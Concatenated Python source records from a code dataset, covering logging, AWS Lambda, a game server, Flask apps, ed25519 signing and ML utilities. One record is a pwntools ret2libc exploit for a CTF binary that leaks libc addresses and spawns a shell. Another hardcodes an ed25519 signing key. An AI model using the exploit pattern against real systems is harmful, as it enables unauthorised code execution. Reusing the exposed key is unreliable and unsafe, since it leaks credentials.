loguru\n\n\ndef log_func(*, entry=True, exit=True, level=\"DEBUG\"):\n def wrapper(func):\n name = func.__name__\n\n @functools.wraps(func)\n def wrapped(*args, **kwargs):\n logger = loguru.logger.opt(depth=1)\n if entry:\n logger.log(\n level, \"Entering '{}' (args={}, kwargs={})\", name, args, kwargs\n )\n result = func(*args, **kwargs)\n if exit:\n logger.log(level, \"Exiting '{}' (result={})\", name, result)\n return result\n\n return wrapped\n\n return wrapper\n\n\nclass InterceptHandler(logging.Handler):\n stream = sys.stderr\n\n def emit(self, record):\n # Get corresponding Loguru level if it exists\n try:\n level = loguru.logger.level(record.levelname).name\n except ValueError:\n level = record.levelno\n\n # Find caller from where originated the logged message\n frame, depth = logging.currentframe(), 2\n while frame.f_code.co_filename == logging.__file__:\n frame = frame.f_back\n depth += 1\n\n loguru.logger.opt(depth=depth, exception=record.exc_info).log(\n level, record.getMessage()\n )\n\n\ndef get_loglevel():\n # Level from --log-level when using uvicorn\n # If uvicorn doesnt define a level, the logger default (root logger) is\n # used, which is WARNING\n return logging.getLogger('uvicorn').getEffectiveLevel()\n\n\ndef get_logformat(record):\n if 'var' in record['extra']:\n return loguru._defaults.LOGURU_FORMAT + ' {extra[var]}\\n'\n return loguru._defaults.LOGURU_FORMAT + '\\n'\n\n\nclass LogHandler:\n def __ror__(self, obj):\n if isinstance(obj, dict):\n logger = loguru.logger.bind(var=obj)\n else:\n logger = loguru.logger.bind(\n var={'str': str(obj), '__repr__': repr(obj), 'type': type(obj)}\n )\n\n logger.opt(depth=1, ansi=True).debug('Object')\n return obj\n\n def __call__(self, *args, **kwargs):\n return getattr(loguru.logger.opt(depth=1), self.level)(*args, **kwargs)\n\n def __getattr__(self, level):\n handler = LogHandler()\n handler.level = level\n return handler\n\n def setup(self):\n loguru.logger.remove()\n loguru.logger.add(sys.stdout, format=get_logformat, level=get_loglevel())\n loguru.logger.bind(request_id='app')\n logging.basicConfig(handlers=[InterceptHandler()], level=0)\n\n # Can be removed when https://github.com/encode/uvicorn/issues/630 is fixed?\n # Also see https://github.com/Delgan/loguru/issues/247\n logging.getLogger().handlers = [InterceptHandler()]\n\n\nlog = LogHandler()\nlog.setup()\n","sub_path":"api/data/opa/core/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"107836958","text":"from common.logger_utility import *\nfrom common.constants import *\nfrom core.alerts import *\nfrom core.irregularities import *\nfrom core.jams import *\nfrom core.trafficview import *\nimport json\nimport urllib.parse\nimport boto3\n\n\nclass WazeDataCuration:\n\n def __extract_event_metadata(self, event):\n try:\n sns_message = json.loads(event[\"Records\"][0][\"Sns\"][\"Message\"])\n bucket_name = sns_message[\"Records\"][0][\"s3\"][\"bucket\"][\"name\"]\n event_time = event[\"Records\"][0][\"Sns\"][\"Timestamp\"]\n key = urllib.parse.unquote_plus(sns_message[\"Records\"][0][\"s3\"][\"object\"][\"key\"])\n except Exception as e:\n LoggerUtility.logError(\"Unable to extract bucket name and key from sns message\")\n raise e\n return bucket_name, key, event_time\n\n def __read_raw_data_from_submission_file(self, bucket, key, aws_request_id, event_time):\n try:\n s3_resource = boto3.resource('s3')\n s3_object = s3_resource.Object(bucket, key)\n data = s3_object.get()['Body'].read().decode('utf-8')\n metadata = s3_object.get()['Metadata']\n data_set = key.split('/')[0]\n curated_bucket = os.environ['CURATED_BUCKET_NAME']\n if 'wazetrafficview' == data_set:\n trafficview = TrafficView()\n trafficview.curate_traffic_view_data(data, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n\n if 'waze' == data_set:\n traffic_type = key.split('/type=')[1].split('/')[0]\n state_name = key.split('/state=')[1].split('/')[0]\n if traffic_type == \"alert\":\n alerts = Alerts()\n alerts.curate_alert_data(data, state_name, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n if traffic_type == \"jam\":\n jams = Jams()\n jams.curate_jams_data(data, state_name, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n if traffic_type == \"irregularity\":\n irregularities = Irregularities()\n irregularities.curate_irregularities_data(data, state_name, key, data_set, curated_bucket, metadata, aws_request_id, event_time)\n except Exception as e:\n LoggerUtility.logError(\"Unable to read the raw submission file\")\n raise e\n\n def __get_current_batch_id(self):\n try:\n dynamodb_batch_table_name = os.environ['DDB_BATCH_TABLE_ARN'].split('/')[1]\n dynamodb = boto3.resource('dynamodb')\n batch_table = dynamodb.Table(dynamodb_batch_table_name)\n response = batch_table.scan(\n FilterExpression=Attr('IsCurrent').eq('true')\n )\n batch_id = \"\"\n if response['Count'] != 0:\n for item in response['Items']:\n batch_id = item['BatchId']\n LoggerUtility.logInfo(\"Current batch id - {}\".format(batch_id))\n except Exception as e:\n LoggerUtility.logError(\"Unable to fetch current batch id\")\n raise e\n return batch_id\n\n def waze_data_curation(self, event, context):\n bucket_name, key, event_time = self.__extract_event_metadata(event)\n #batch_id = self.__get_current_batch_id()\n request_id = context.aws_request_id\n self.__read_raw_data_from_submission_file(bucket_name, key, request_id, event_time)\n","sub_path":"lambdas/waze_data_curation_lambda_handler.py","file_name":"waze_data_curation_lambda_handler.py","file_ext":"py","file_size_in_byte":3503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"322761235","text":"# coding=utf-8\nimport datetime\nfrom game.models import Game\nfrom player.remote import RemotePlayer\nimport json\nfrom error.models import GameError\nfrom gevent import monkey\nfrom renderer.websocket import WebSocketRenderer\nfrom game.server import ServerGame\n \n# Use gevent monkey thread patch\nmonkey.patch_all()\n\nimport library.bottle\n\nclass Server(object):\n \"\"\"\n \" The Server class. It provides the REST API server that will allow\n \" a multiple remote player game.\n \"\n \"\"\"\n\n def __init__(self, address):\n \"\"\"\n \" Server constructor.\n \"\n \" @param (host, port) binding address\n \"\"\"\n\n super(Server, self).__init__()\n \n self.address = address\n self.server = library.bottle.Bottle()\n \n # Initialize server games\n self.current_game_id = 0\n self.games = {}\n \n def run(self):\n \"\"\"\n \" Start the server thread.\n \"\n \"\"\"\n # Initialize routes\n #Game initialization routes\n self.server.route(\"/game\", method=\"POST\")(self.http_create_game)\n self.server.route(\"/game//player\", method=\"POST\")(self.http_add_player)\n self.server.route(\"/game//player//ready\", method=\"POST\")(self.http_set_player_ready)\n self.server.route(\"/game//start\", method=\"GET\")(self.http_game_start)\n\n #Game informations routes\n self.server.route(\"/game//players\", method=\"GET\")(self.http_get_players)\n\n #Game actions routes\n self.server.route(\"/game//player//move\", method=\"POST\")(self.http_move)\n\n # Start Bottle server\n self.log(\"Start the server with address (%s, %s)\" % (self.address[0], self.address[1]))\n library.bottle.run(self.server, host=self.address[0], port=self.address[1], server='gevent')\n self.log(\"Server ending\")\n \n def stop(self):\n \"\"\"\n \" Stop the server\n \"\n \"\"\"\n library.bottle.abort()\n \n def http_add_player(self, game_id):\n \"\"\"\n \" Add a player to a game.\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n \n # Compute the player object\n name = self.getJson('name')\n player = RemotePlayer(name)\n \n try:\n game.add_player(player)\n \n # Return player_id\n return self.returnJson({\n 'player_id': player.id\n })\n except GameError as e:\n return self.return_error(e.getValue())\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def http_get_players(self, game_id):\n \"\"\"\n \" Get game players\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n \n return self.returnJson([player.toJSON() for player in game.players])\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def http_set_player_ready(self, game_id, player_id):\n \"\"\"\n \" Set the player ready.\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n player = game.get_player(player_id)\n \n if player is not None:\n player.setReady()\n return self.returnJson({\"message\": \"OK\"})\n else:\n return self.return_error(\"The player doesn't exists\")\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def http_game_start(self, game_id):\n \"\"\"\n \" Return when the player can start the game.\n \"\n \"\"\"\n if self.games.has_key(game_id):\n # Get the game and player object\n game = self.games.get(game_id)\n \n for player in game.players:\n # Wait 60 seconds for the player to be ready, else\n # raise an error\n try:\n player.waitPlay()\n \n return self.http_get_players(game_id)\n except GameError as e:\n return self.return_error(e.getValue())\n \n else:\n return self.return_error(\"The game doesn't exists\")\n\n def http_create_game(self):\n \"\"\"\n \" Create a new game on server.\n \"\n \"\"\"\n self.current_game_id += 1\n game_id = self.current_game_id\n num_players = self.getJson('num_players')\n \n # Create game object and store it\n game = ServerGame(num_players)\n self.games[game_id] = game\n \n # Create and store the renderer\n game.setRenderer(WebSocketRenderer(game))\n \n # Start game\n game.start()\n \n return {\n 'game_id': game_id\n }\n \n def returnJson(self, obj):\n \"\"\"\n \" Serialize an object to a JSON string.\n \"\n \"\"\"\n return json.dumps(obj)\n \n def getJson(self, name=None):\n \"\"\"\n \" Get an attribute of (or entiere) sent JSON.\n \"\n \"\"\"\n parsed_json = json.load(library.bottle.request.body)\n if name is None:\n return parsed_json\n else:\n return parsed_json.get(name)\n \n def return_error(self, message):\n \"\"\"\n \" Return an error\n \"\n \" @param string message\n \" @return string\n \"\"\"\n return self.returnJson({\n 'error': message\n })\n\n def http_move(self, game_id, player_id):\n \"\"\" Handle the request to move the block\n \"\"\"\n\n if self.games.has_key(game_id):\n # Get the game object\n game = self.games.get(game_id)\n if game.state == Game.STATE_WAITING:\n return self.return_error(\"Game is not yet started\")\n\n player = game.get_player(player_id)\n\n move_id = self.getJson(\"move_id\")\n\n avalaible_moves = ['',\n player.ACTION_MOVE_RIGHT,\n player.ACTION_ROTATE_LEFT,\n player.ACTION_MOVE_DOWN,\n player.ACTION_MOVE_FULLDOWN,\n player.ACTION_ROTATE_LEFT,\n player.ACTION_ROTATE_RIGHT,\n player.ACTION_SYM_HORIZONTAL,\n player.ACTION_SYM_VERTICAL,\n player.ACTION_PASS\n ]\n\n try:\n player.do(avalaible_moves[move_id])\n return self.http_get_players(game_id)\n except:\n return self.return_error(\"Impossible Move\")\n else:\n return self.return_error(\"The game doesn't exists\")\n \n def log(self, message):\n \"\"\"\n \" Output some log on the standard output.\n \"\n \" @param string the message to be logged\n \"\"\"\n print (\"%s: %s\" % (datetime.datetime.now(), message))","sub_path":"server/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"139121627","text":"import pytest\n\n\n@pytest.mark.usefixtures(\"get_driver\")\n@pytest.mark.P2\n@pytest.mark.tba\nclass TestEmailValidation:\n def test_email_validation(self):\n \"\"\"\n Verify e-mail field validation during users registration.\n\n 1. Open main page.\n 2. Move to registration form.\n 3. Provide invalid data in e-mail field:\n - simple text, ie 'user'\n - invalid format, ie 'wp.pl'\n - e-mail already existing\n 4. Confirm registration.\n\n Expected result:\n User should still be on registration page.\n E-mail field should be marked with valid message.\n User should not receive e-mail registration message.\n \"\"\"","sub_path":"tests/ui/registration/validation/test_email_validation/test_email_validation.py","file_name":"test_email_validation.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"290844460","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__Auther__ = 'M4x'\n\nfrom pwn import *\nfrom LibcSearcher import LibcSearcher\ncontext.log_level = \"debug\"\n\nelf = ELF(\"./ret2lib\")\nputs_got = elf.got[\"puts\"]\n\nio = process(\"./ret2lib\")\nio.sendlineafter(\" :\", str(puts_got))\nio.recvuntil(\"0x\")\nputs_addr = int(io.recvuntil(\"\\n\"), 16)\n\nlibc = LibcSearcher(\"puts\", puts_addr)\nlibc_base = puts_addr - libc.dump(\"puts\")\nsys_addr = libc_base + libc.dump(\"system\")\nsh_addr = libc_base + libc.dump(\"str_bin_sh\")\n\npayload = fit({0x38 + 0x4: [p32(sys_addr), p32(0xdeadbeef), p32(sh_addr)]})\nio.sendlineafter(\" :\", payload)\nio.interactive()\nio.close()\n","sub_path":"ctfWIKI_ret2libc/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"209673909","text":"import datetime\nimport calendar\n\ndef addMonths(origDate, numMonths):\n # Advance year and month by one month\n newYear = origDate.year\n newMonth = origDate.month + numMonths\n # Note: in datetime.date, months go from 1 to 12\n if newMonth > 12:\n newYear += 1\n newMonth -= 12\n\n lastDayOfMonth = calendar.monthrange(newYear, newMonth)[1]\n newDay = min(origDate.day, lastDayOfMonth)\n\n return origDate.replace(year=newYear, month=newMonth, day=newDay)\n","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"188202626","text":"\"\"\"\nMarshallers for the current endpoint\n\"\"\"\nfrom copy import deepcopy\nfrom flask_restplus import fields\nfrom .namespaces import api\n\n# provider marshaller constructoin\nprovider_fields = {}\nprovider_fields['id'] = fields.Integer(description='Provider id',\n example=14)\nprovider_fields['name'] = fields.String(required=True,\n min_length=1, max_length=200,\n description='Provider Name',\n example='Snakeoil Ltd')\nprovider_fields['email'] = fields.String(required=True,\n example='email@mydomain.com',\n pattern=r'\\S+@\\S+\\.\\S+',\n description='Provider e-mail')\nprovider_fields['phone'] = fields.String(required=True,\n example='+359888784983',\n pattern=r'[\\+\\d]+',\n description='Phone Number')\nprovider_fields['language'] = fields.String(required=True,\n example='EN',\n min_length=2,\n max_length=3,\n description='Language,'\n ' choose one from'\n ' language list')\nprovider_fields['currency'] = fields.String(required=True,\n example='BGN',\n min_length=3,\n max_length=3,\n description='Currency,'\n ' choose one from'\n ' currency list')\nprovider_fields['uri'] = fields.Url('providers_provider',\n description='Provider URI')\n\n# construct get marshaller from the fields\nprovider_get_marsh = api.model('ProviderGet', provider_fields)\n\n# edit marshaller\nprovider_edit_fields = deepcopy(provider_fields)\ndel provider_edit_fields['id']\ndel provider_edit_fields['uri']\nprovider_edit_marsh = api.model('ProviderEdit', provider_edit_fields)\n","sub_path":"api_example/apis/providers/marshallers.py","file_name":"marshallers.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"519120327","text":"# !/uer/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@File : global_abspath.py\n@Time : 2020-11-12 9:32\n@Author : yang_dang\n@Contact : 664720125@qq.com\n@Version : 1.0\n@Description : 获取项目路径,该文件只能放在项目的根路径下\n\"\"\"\nimport os\n\n\ndef get_abspath(path):\n \"\"\"\n 合成绝对路径:输入文件名或者相对路径,路径错误返回None\n \"\"\"\n if os.path.exists(path):\n return os.path.abspath(path)\n else:\n path = os.path.abspath(os.path.dirname(__file__) + os.sep + path)\n if os.path.exists(path):\n return path\n else:\n return None\n\n\n","sub_path":"global_abspath.py","file_name":"global_abspath.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"155826782","text":"#! /usr/bin/env python3\n# backend.py - Backend of Geocoder App that is built via flask.\nfrom flask import Flask, render_template, request, send_file, Response\nfrom werkzeug import secure_filename\nfrom latlon import handleUpload\n\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/uploaded', methods=['POST'])\ndef uploaded():\n global upload\n if(request.method=='POST'):\n upload = request.files['file']\n extension = upload.filename[-4:]\n # Check if it's a CSV file, otherwise tell the user.\n if(extension == '.csv'):\n newfilename = secure_filename('uploaded' + upload.filename)\n upload.save(newfilename)\n handleUpload.readfile(newfilename)\n # Check if file contains an Address column, otherwise tell user.\n if(handleUpload.containsAddress()==True):\n handleUpload.addingLatLon()\n handleUpload.newCSV()\n return render_template('index.html', btn='download.html', content=handleUpload.render())\n else:\n return render_template('index.html', text='The file you uploaded either does\\\n not have a column named \"Address\", \"address\", or possibly contains both. \\\n Please upload a file containing only 1 \"address\" or \"Address\" column.')\n else:\n return render_template('index.html', text='The file you uploaded\\\n is not a CSV file. Please reupload with a CSV file.')\n\n@app.route('/download')\ndef download():\n return send_file('yourfile.csv',\n attachment_filename='yourfile.csv',\n as_attachment=True)\n\nif __name__ == '__main__':\n #app.debug=True\n app.run()\n","sub_path":"Geocoder_App/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"644897442","text":"import os \n\ntry:\n with open('freepngimg/freepngimg_report.csv', 'w') as file:\n file.write('link,home_page,category,child_category,count\\n')\n for cat_dir in os.listdir('freepngimg'):\n for child_cat_dir in os.listdir('freepngimg/{}'.format(cat_dir)):\n lines = [line.strip() for line in open('freepngimg/{}/{}/links.txt'.format(cat_dir, child_cat_dir), 'r') if len(line) > 0]\n nbr_img_link = len(lines)\n file.write('https://www.freepngimg.com/{}/{},freepngimg.com,{},{},{}\\n'.format(cat_dir, child_cat_dir, cat_dir, child_cat_dir, nbr_img_link))\n\nexcept:\n print(cat_dir)\n","sub_path":"export_report.py","file_name":"export_report.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"633467220","text":"#!coding:utf8\r\n\r\n#author:yqq\r\n#date:2020/5/21 0021 10:42\r\n#description:\r\nimport json\r\nimport time\r\n\r\nfrom ed25519 import SigningKey, VerifyingKey\r\n\r\n\r\n\r\n\r\ndef sign_msg(sign_key : str, msg : bytes) -> any:\r\n sk = SigningKey(sk_s=sign_key.encode('latin1'), prefix='', encoding='base64')\r\n sig = sk.sign(msg=msg, prefix='', encoding='base64')\r\n return sig\r\n\r\n\r\ndef verify_sig(verify_key : str, sig : str, msg : bytes) -> bool:\r\n vk = VerifyingKey(vk_s=verify_key, prefix='', encoding='base64')\r\n try:\r\n vk.verify(sig=sig, msg=msg, prefix='', encoding='base64')\r\n except Exception as e:\r\n return False\r\n return True\r\n\r\n\r\n\r\n#\r\n# def create_sign_msg(method, url, timestamp, body):\r\n# params_list = [method, url, timestamp]\r\n#\r\n# if method == \"POST\":\r\n# sorted_body = sorted(body.items(), key=lambda d: d[0], reverse=False)\r\n# print(\"sorted_body= \", sorted_body)\r\n#\r\n# data_list = []\r\n# for data in sorted_body:\r\n# if isinstance(data[1], list):\r\n# value = \"[\" + \" \".join(data[1]) + \"]\"\r\n# key = data[0]\r\n# data_list.append(key + \"=\" + value)\r\n# else:\r\n# data_list.append(\"=\".join(data))\r\n#\r\n# body_params = \"&\".join(data_list)\r\n# params_list.append(body_params)\r\n#\r\n# params_str = \"|\".join(params_list)\r\n# print(\"params_str= \", params_str)\r\n# return params_str\r\n\r\n\r\ndef main():\r\n ASCCI_VERIFY_KEY = 'WSWAZBS2jty72O5x/2DOTevGwfhPvmXWpclzGWp6M0E'\r\n ASCCI_SING_KEY = 'n6R1lfDJe5ipiy5KPItTXbMIEu2htV48H0pjPqDgw8A'\r\n\r\n\r\n # msg = '{\"err_code\": 0, \"err_msg\": null, \"timestamp\": 1590026959936, \"data\": {\"serial_id\": \"202005211009196209625\", \"order_id\": \"73465774472360\"}}'\r\n\r\n\r\n data = {\r\n \"pro_id\": 3,\r\n \"serial_id\": \"202005181831579041211\"\r\n }\r\n\r\n jdata = json.dumps(data, separators=(',',':'), sort_keys=True) #按照key字母顺序排序\r\n\r\n #'1590040704197'\r\n timestamp = '1590040704197' #str(int(time.time() * 1000))\r\n # method = 'POST'\r\n url = 'querywithdraworder'\r\n\r\n param = '|'.join([timestamp, url,jdata])\r\n print(param)\r\n\r\n msg = param.encode('utf8')\r\n sig = sign_msg(sign_key=ASCCI_SING_KEY, msg=msg)\r\n print(f'sig:{sig}')\r\n if verify_sig(verify_key=ASCCI_VERIFY_KEY, sig=sig, msg=msg):\r\n print('verify ok')\r\n else:\r\n print('verify failed')\r\n\r\n pass\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n main()","sub_path":"Python3/Tornado/apps/pg/PG_Deposit/src/lib/my_apiauth/my_ed25519.py","file_name":"my_ed25519.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"305261674","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nfrom tfsnippet.trainer import merge_feed_dict\nfrom tfsnippet.utils import get_default_session_or_error\n\n__all__ = ['collect_outputs', 'plot_2d_log_p', 'ClusteringClassifier']\n\n\ndef collect_outputs(outputs, inputs, data_flow, feed_dict=None, session=None):\n \"\"\"\n Run TensorFlow graph by mini-batch and concat outputs from each batch.\n\n Args:\n outputs (Iterable[tf.Tensor]): Output tensors to be computed.\n inputs (Iterable[tf.Tensor]): Input placeholders.\n data_flow (DataFlow): Data flow to feed the input placeholders.\n feed_dict: Optional, additional feed dict.\n session: The TensorFlow session. If not specified, use the\n default session.\n\n Returns:\n tuple[np.ndarray]: The concatenated outputs.\n \"\"\"\n outputs = list(outputs)\n inputs = list(inputs)\n session = session or get_default_session_or_error()\n\n collected = [[] for _ in range(len(outputs))]\n for batch in data_flow:\n batch_feed_dict = merge_feed_dict(\n feed_dict,\n {k: v for (k, v) in zip(inputs, batch)}\n )\n for i, o in enumerate(session.run(outputs, feed_dict=batch_feed_dict)):\n collected[i].append(o)\n\n for i, batches in enumerate(collected):\n collected[i] = np.concatenate(batches, axis=0)\n return tuple(collected)\n\n\ndef plot_2d_log_p(x, log_p, cmap='jet', **kwargs):\n \"\"\"\n Plot :math:`log p(x)` for 2-d `x`.\n\n Args:\n x: 3-d Tensor of shape (?, ?, 2).\n log_p: 2-d Tensor of shape (?, ?), i.e., x.shape[:2].\n cmap: The color map for plotting :math:`log p(x)`. (default \"jet\")\n \\**kwargs: Additional named arguments passed to ``plt.figure``.\n\n Returns:\n plt.Figure: The plotted figure.\n \"\"\"\n x = np.asarray(x)\n if not len(x.shape) == 3 or x.shape[2] != 2:\n raise ValueError('The shape of `x` must be (?, ?, 2), got {!r}'.\n format(x.shape))\n log_p = np.asarray(log_p)\n if log_p.shape != x.shape[:2]:\n raise ValueError('The shape of `log_p` must be x.shape[:2], got {!r}'.\n format(log_p.shape))\n\n fig = plt.figure(**kwargs)\n cmap = plt.get_cmap(cmap)\n z = np.exp(log_p)\n h = plt.pcolormesh(x[:, :, 0], x[:, :, 1], z[:-1, :-1], cmap=cmap)\n plt.colorbar(h)\n return fig\n\n\nclass ClusteringClassifier(object):\n \"\"\"\n Un-supervised classifier based on clustering algorithm.\n\n The performance of a clustering algorithm can be evaluated by the\n proxy of its classification performance, once given true class labels.\n \"\"\"\n\n def __init__(self, n_clusters, n_classes):\n \"\"\"\n Construct a new :class:`ClusteringClassifier`.\n\n Args:\n n_clusters (int): Number of clusters.\n n_classes (int): Number of classes.\n \"\"\"\n self.n_clusters = n_clusters\n self.n_classes = n_classes\n self.cluster_probs = np.zeros([n_clusters])\n self.cluster_class_probs = np.zeros([n_clusters, n_classes])\n self.cluster_classes = np.ones([n_clusters], dtype=np.int32) * -1\n self._A = np.identity(n_clusters, dtype=np.float32)\n self._B = np.identity(n_clusters * n_classes, dtype=np.float32)\n\n def describe(self):\n \"\"\"\n Describe the clustering classifier.\n\n Returns:\n str: Description of the classifier.\n \"\"\"\n ret = [\n 'Cluster probs: [{}]'.format(\n ', '.join('{:.4g}'.format(p) for p in self.cluster_probs)),\n 'Cluster labels: {}'.format(self.cluster_classes.tolist()),\n 'Cluster label probs:'\n ]\n for i, label_prob in enumerate(self.cluster_class_probs):\n ret.append(' {}: [{}]'.format(\n i, ', '.join('{:.4g}'.format(p) for p in label_prob)))\n return '\\n'.join(ret)\n\n def fit(self, c_pred, y_true):\n \"\"\"\n Fit the clustering based classifier.\n\n Args:\n c_pred (np.ndarray): 1-d array, the predicted cluster indices.\n y_true (np.ndarray): 1-d array, the true class labels.\n \"\"\"\n c_pred = np.asarray(c_pred)\n y_true = np.asarray(y_true)\n if len(c_pred.shape) != 1:\n raise ValueError('`c_pred` must be 1-d array.')\n if y_true.shape != c_pred.shape:\n raise ValueError('The shape of `y_true` must be equal to '\n 'that of `c_pred`.')\n self.cluster_probs = np.mean(self._A[c_pred], axis=0)\n class_probs = np.sum(self._B[c_pred * self.n_classes + y_true], axis=0)\n class_probs = class_probs.reshape([self.n_clusters, self.n_classes])\n class_probs = class_probs / np.maximum(\n np.sum(class_probs, axis=-1, keepdims=True), 1)\n self.cluster_class_probs = class_probs\n self.cluster_classes = np.argmax(class_probs, axis=-1)\n\n def predict(self, c_pred):\n \"\"\"\n Predict the most likely label.\n\n Args:\n c_pred (np.ndarray): 1-d array, the predicted cluster indices.\n\n Returns:\n np.ndarray: 1-d array, the predicted class labels.\n \"\"\"\n c_pred = np.asarray(c_pred)\n if len(c_pred.shape) != 1:\n raise ValueError('`c_pred` must be 1-d array.')\n return self.cluster_classes[c_pred]\n","sub_path":"tfsnippet/examples/utils/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":5369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"641838744","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\nfrom sqlalchemy import create_engine\nfrom tranny.app import Base\n\n__author__ = \"Leigh MacDonald \"\n__license__ = \"BSD 3-Clause\"\n__copyright__ = \"Copyright (c) 2013-2014 Leigh MacDonald\"\n__version__ = '0.0.1'\n\nimport argparse\nimport logging\n\n\ndef parse_args(args=None):\n \"\"\" Parse command line argument and launch the appropriate command specifid\n by the user input\n \"\"\"\n\n def cmd_start(options):\n import gevent\n import signal\n from tranny.manager import ServiceManager\n\n gevent.signal(signal.SIGQUIT, gevent.kill)\n\n application = ServiceManager()\n application.start()\n\n def cmd_db_drop(options):\n from tranny.datastore import db_drop\n\n db_drop()\n\n def cmd_db_init(options):\n from tranny.datastore import db_drop, db_init\n\n db_init(username=options.username, password=options.password, wipe=options.wipe)\n\n def cmd_cache_clear(options):\n from tranny import cache\n\n cache.invalidate()\n\n def cmd_imdb(options):\n from tranny.service import imdb\n imdb.load_sql(options.nodownload)\n\n def cmd_geoip(options):\n from tranny.service import geoip\n from tranny.app import Session\n from tranny.app import config\n\n engine = create_engine(config.get_db_uri())\n Session.configure(bind=engine)\n Base.metadata.create_all(bind=engine)\n\n db_file_path = geoip.fetch_update(download=options.nodownload)\n geoip.update(Session(), db_file_path)\n\n parser = argparse.ArgumentParser(prog=\"tranny-cli.py\", description=\"Tranny torrent management system\")\n parser.add_argument(\"-c\", \"--config\", help=\"Specify alternate config path\", default=False)\n parser.add_argument(\"-l\", \"--loglevel\", help=\"Set logging level\", default=False)\n\n subparsers = parser.add_subparsers(help=\"Command help\")\n\n db_init = subparsers.add_parser(\"db_init\", help=\"Initialize the database schema\")\n db_init.add_argument(\"-u\", \"--username\", help=\"Admin username\", default=\"admin\")\n db_init.add_argument(\"-p\", \"--password\", help=\"Admin password\", default=\"tranny\")\n db_init.add_argument(\"-w\", \"--wipe\", help=\"Wipe any existing database\", action=\"store_true\")\n db_init.set_defaults(func=cmd_db_init)\n\n db_drop = subparsers.add_parser(\"db_drop\", help=\"Drop (delete) the existing database. This is non-reversible.\")\n db_drop.set_defaults(func=cmd_db_drop)\n\n run = subparsers.add_parser(\"run\", help=\"Run the application\")\n run.add_argument(\"-H\", \"--host\", help=\"WebUI host to bind to\", default=\"admin\")\n run.add_argument(\"-P\", \"--port\", help=\"WebUI port to bind to\", default=\"tranny\")\n run.set_defaults(func=cmd_start)\n\n # aliases=['cc'] (requires 3.2+)\n cache_clear = subparsers.add_parser(\"cache_clear\", help=\"Clear the application cache\")\n cache_clear.set_defaults(func=cmd_cache_clear)\n\n imdb = subparsers.add_parser(\n \"imdb\",\n help=\"Load and manage the imdb SQL database (warn: This can take 1-10 hrs to complete\"\n )\n imdb.add_argument(\"-n\", \"--nodownload\",\n help=\"Do not download the datasets before loading (assumes existing data)\",\n action=\"store_false\")\n imdb.set_defaults(func=cmd_imdb)\n\n geoip = subparsers.add_parser(\"geoip\", help=\"Load and manage the geoip database\")\n geoip.add_argument(\"-n\", \"--nodownload\",\n help=\"Do not download the datasets before loading (assumes existing data)\",\n action=\"store_false\")\n geoip.set_defaults(func=cmd_geoip)\n\n return parser.parse_args(args=args)\n\n\ndef main():\n \"\"\" Main entry point for the application. Runs the command parsed from the CLI\n using the argparse func system\n \"\"\"\n # Exception raised on exit due to threading module loading before gevent\n # This preemptive patching prevents this\n # see: http://stackoverflow.com/questions/8774958/keyerror-in-module-threading-after-a-successful-py-test-run\n import sys\n\n if 'threading' in sys.modules:\n del sys.modules['threading']\n import gevent\n import gevent.monkey\n\n gevent.monkey.patch_all()\n\n # Setup logger & config\n from tranny.app import config\n # Execute the user command\n arguments = parse_args()\n\n try:\n if arguments.loglevel:\n log_level = arguments.loglevel.upper()\n elif config.has_option(\"log\", \"level\"):\n log_level = config.get_default(\"log\", \"level\")\n else:\n log_level = \"INFO\"\n log_fmt = config.get_default(\"log\", \"format\", \"%(levelname)s %(asctime)s %(name)s: %(message)s\")\n logging.basicConfig(level=logging.getLevelName(log_level), format=log_fmt)\n\n if arguments.config:\n config.initialize(arguments.config)\n arguments.func(arguments)\n except Exception:\n logging.exception(\"Fatal error, cannot start!\")\n sys.exit(1)\n else:\n sys.exit(0)\n\n\nif __name__ == '__main__':\n 